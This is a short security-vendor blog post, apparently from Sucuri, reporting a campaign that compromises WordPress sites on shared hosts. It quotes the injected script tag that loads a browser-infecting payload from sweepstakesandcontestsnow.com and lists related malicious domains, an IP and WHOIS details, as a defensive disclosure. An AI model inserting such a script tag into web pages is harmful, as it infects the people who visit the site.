Research Blog

New Malware – sweepstakesandcontestsnow.com

We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with a malware from sweepstakesandcontestsnow.com.

This is what is gets added to the hacked site:

 

<script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">..

And that code is used to infect the browser of the person visiting the compromised web site.

 
What is interesting is that this attack is being done by the same group that infected thousands of GoDaddy sites with the sokoloperkovuskeci.com .htaccess redirection (all hosted at 91.220.0.30):

 

sokoloperkovuskeci.com
sweepstakesandcontestsnow.com
sweepstakesandcontestsinfo.com
sweepstakesandcontestsdo.com

Whois of the group behind it:

Registrant Contact:
NA
Gavai Otarro admin@sweepstakesandcontestsnow.com
+1.445669776 fax: +1.445669776
5653 6th Street
Pittsburgh PA 54353
us

If your site is compromised, sign up with us and we will fix it for you: http://sucuri.net/signup

 

Client Love

Customer satisfaction is our top priority and our clients can confirm. Check out some real recommendations from real clients.
   
   

Scan your website FOR FREE